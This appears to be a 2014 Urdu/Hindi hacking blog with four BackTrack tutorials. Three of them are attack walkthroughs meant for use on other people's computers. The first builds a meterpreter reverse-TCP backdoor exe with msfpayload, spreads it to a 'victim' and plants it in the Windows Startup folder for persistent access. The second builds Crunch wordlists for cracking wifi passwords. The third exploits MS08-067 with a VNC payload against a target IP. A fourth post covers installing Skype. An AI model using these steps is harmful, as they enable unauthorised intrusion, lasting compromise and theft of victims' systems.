Monday 24 March 2014

Hack Computer For Life Time In Urdu Hindi

Assalamoalikum wr wb , 

 Umeed hy ap sab theek hongy ,
       Well hum ajj sekhengy ky kasy hum kisi bhi pc ko Hack karty han wo bhi lifetime ky liye asan hi hy bas commands ko follow karny ky bjaye ap in sab Commands ko yad kar leyn to ziyada bahtar hoga aor samajh leyn 

Note " Sab commands Ky liye mein Red colour Use karonga And ap ki samajh mein a jay sath sath type karky btata bhi rahoonga...
Ap sab ka apna Dost      @Khaksaar 

To Sab sy pahly hum Armitage ko open karny ka tariqa sekhengy First Step Open Your Terminal And Type in >armitage < And Hit Enter.. 

Us Ky Bad Thora Intezar karny ky bad 1 choti si window khully gi jis mein Ip Add aor Port Likha ho ga us ko ok kar deyngy koi bhi changing nahi karengy again Yes or No Wala boX khully ga us Ko bhi Yes kar denna hy and thora sa Wait karny Ky Bad.. 
Humari BackTrack ki screen par humara Armitage open ho jay ga Us ky Bad armitage ko minimize Kar ky Choor Dyngy.. 
Aor Phir Hum Apni BackDoor File BnayengyJis ki maddad sy hum kisi ko bhi Hack Karengy Ess Commands ki Maddad Sy Aor Hum Jo File Bnayengy..
Wo File Humari Root Folder Mein Automatic Save HOo Jay Gi > > Backdoor File Bnany Ki Command Yea Hy..
Command > 
msfpayload windows/meterpreter/reverse_tcp LHOST=Your BackTrack Ifconfig ip LPORT=Your Port X > Your file name.exe

And Just HiT enter.. 
Thory sy process ky Bad ap ki file ban jay Gi..
               


                          """Important Notice"""

Mein apna Modem Use kar Raha hoon Es Liye Mein nay IfConfig Mein Sy apni Lan Ip LHOST ky samny donga and LPORT ky samny apna port Donga 
Port Forwording : 1 asan sa Tariqa hy Us katariqa Mein Alag Sy Tut Mein Bnna Kar Dy Doonga Khair Jo Log Wifi Use Kar Rahy Han Un Ko Apni Wlan wali ip LHOST KY SAMNY = Ky Bad Likhengy Yea Important Hy Warna Ap Ki File Kam Nahi Kary Gi... 


Humari File Ab Ban Chukki Hy Jo Ky Root Folder Mein Save Ho Gai Hy Ap Wahan Sy Apni File Ko Kaheen Sy Bhi Online Upload Kar Dyngy And Apna Shikar Dondengay Khair Ap Ki File Ban Chukki Hy Aor Ab Ap ko Apny Armitage Mein Ja Kar Upar Dekhna Hy 1 Option Ho Ga 


Armitage   ky name sy us ko khilengy and 5th wala option Listeners Mein Jayengy And wahan sy Reverse ( wait for ) par click karna hy Yahan Humien Apna Port Dena Hy Jo Hum Virtual mein bnayengy And >> Type << waly BoX mein >> Meterpreter << Yea select Karny Ky Bad Hum Wait Karty Han Ky Koi Us File Py Click Karta Hy Jasy Hi Ap Ki file Py koi Click Kary Ga Ap Ki Armitage Ki Nechy Black Screen Mein 1 Line Chal Jay Gi Like Aysy >>> 



Meterpreter session 3 opned ( Victim ip -> again ip ) at Date Time +0100 




Jab Humara Victim System show ho jay ga to hum us ko Life Time Ky Liye Hack Karengy Ky Wo Agar Kabhi system restart karta hy to ap ky pass us ka system Still Hack Rahy ga.. 
Us Ky Liye hum yea info command Use karengy  >>



C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


                                           " Note "
Uper wali line  Command mein ap ko jo username nazar a raha hy White colour ka yahan hum apny victim ky Pc Ka User Name Dalengy username ki jagan like aysy next line mein change dekh leyn ap sab.. 



C:\Users\Your victim system name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 



Ab ap Sochengy ky user name khan sy ayy ga us ky liye hum jab system ko hack karty hn to wahan chota sa moniter show hota hy humien Victim ka us ky nichy puri detail hoti hy us ka username wahan sy dekh leyn so agy chalty han... 


Ab Humien Victim ki StartUp Directory Mein jana hy aor humary Pass Command yan Location code a chukka hy to Hum Ab apny 
                              BackTrack Armitage ki window kholengy aor apny Victim ky pc par Right Click Karengy aor wahan sy 1st Option Meterpteter 2 mein jayiengy phir 3rd option Explore mein jayengy and Browse Files 
                          Par Click Karty Hi Humary Pas Armitage Ki window mein nechy Pannel khul jay ga wahan hum apni yea wali command dalengy aor enter marenGy 

Command > 

C:\Users\Your victim system name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Us Ky Bad Humien Ini File Nazar Ayy Gi Aor Yahn Es Folder Mein Hum Apna BackDoor Ki File Ko Upload Ky Option Ki Madad Sy Upload Karengy..


Ab Jasy Hi Humari File uPload ho jay gi Es Folder Mein to System Hack Rahy Ga Hamesha Ky Liye Aor Hamesha Restart Hony Par Yea Humari BackDoor File Ko Automatic Run Kar Diya Kary Ga.. Ajj Ky Liye Bass Itna Hi Umeed Hy Ap Ko Samajh Aaa Jay Gi Jald Hi..
                           
                                             InshAllah.. 





Note : Wo Commands Jo Hum Nay Lgani Han Un Ko Mein Red Colour Mein Type Karonga 




Source : http://linux-commands-backtrack.blogspot.com 



Port Forwording Ky Liye Mein Jald Hi Web Site Py TuT Bnna Donga.. 
                         Thanks.. 

  





    PAKISTAN ZINDABAD PAKISTAN PAINDABAD

Thursday 20 March 2014

How To Creat WordList In BackTrack Crunch With Commands

Assalamoalikum wr wb , 
Acha To Hum Sab Ajj Word List Bnana Sekhengy To Start Karty Han Apna Terminal Kholien Command Ka Aor 1st Command Sy Start Kar Deyn Ap Ki Word List Ban Jayengi But Es Ka Apna 1 Folder Hy Jahan Yea Sab Save Hoga >> Root <<  Mein Ja Kar  >> Pentest >> Passwords >> Crunch << Es Folder mein ap ki wordlist Save Rahy Gi Aor Yahan Sy Hi Hum Es Ko Select Karngy Kaheen Bhi Apny Faidy Ky Liye.
                 Thanks..



Commands Nechy Line Sy Start HonGi..


cd /pentest/passwords/crunch/
ls
./crunch 10 10 1234567890 -t 0599@@@@@@ -o wordlist.lst
./crunch 1 5 1234567 -o wordlist.lst
./crunch 1 5 1234567 -o wordlist2.lst





Ab Ap Ki Wordlist Ki 3 List Hum Nay Bnaa Li Han Jo Humien Wifii Aor Bouth Sy 
Password Hack Karny Mein Madad Kary Gi..

Source : http://linux-commands-backtrack.blogspot.comhttp://linux-commands-backtrack.blogspot.com



Wednesday 19 March 2014

Back Track 5r3 Remote System Hack With Ip Address


Sab sy pahly hum terminal mein command dyngy >   msfconsole
Again new open karien terminal ko and apni ip check karien >  Command > ifconfig
phir ap nay msfconsole ky khul jany ky bad yea command deni hy> show exploits << phir yea process  complete hoga and ap ko nechy wali line dondni hy aor copy karni hy
use windows/smb/ns08 067 netapi
es ky bad command hy >  show options
phir  >  set rhost and victam ip  and enter
phir > show options
phir > set payload windows/vncinject/bind_tcp
phir > show options
phir > exploit
phir enjoy victam ka pc ap ky samny hy....Lolls..

Note :  Commands sirf Red Colour mein han 
Material : http://linux-commands-backtrack.blogspot.com

Saturday 15 March 2014

how install Skype in linux commands Back Track 5r3

Hi Guys !  Sab sy pahly ap logoon ko skype ki web site sy skype download karna parega and..

us ky bad ap ko pata hona cahiye skype debain x64 x64=32 bit so hum Debain ka like 2014 mein yea version best hy ( skype-debian_4.2.0.13-1_i386.deb ) yea apny kisi bhi folder mein save karien roob mein yan desktop py last command.. 

Last Command ka tariqa asan hy waheen sab sy ghalti hoti hy..   

Command yea hy >>    dpkg -i skype-debian_4.2.0.13-1_i386.deb 

And Hit Enter ap ka shype chal jay ga....


apt-get install -f
aptitude install lib32stdc++6 lib32asound2 ia32-libs libc6-i386 lib32gcc1 ia32-libs-gtk


aptitude search ia32-libs


dpkg -i and drag your debain 70 skype file in command box

let it done enjoy..
By - sSs